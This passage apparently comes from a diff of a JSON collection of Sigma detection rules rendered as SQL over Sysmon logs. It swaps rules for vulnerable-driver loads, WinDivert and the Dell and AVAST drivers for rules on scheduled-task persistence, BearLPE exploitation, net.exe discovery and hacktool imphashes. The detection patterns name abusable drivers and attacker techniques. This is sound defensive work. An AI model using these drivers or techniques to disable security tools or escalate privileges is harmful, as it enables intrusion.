ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.collection", - "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Net.exe Execution", + "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_net_susp_execution.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" - ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE 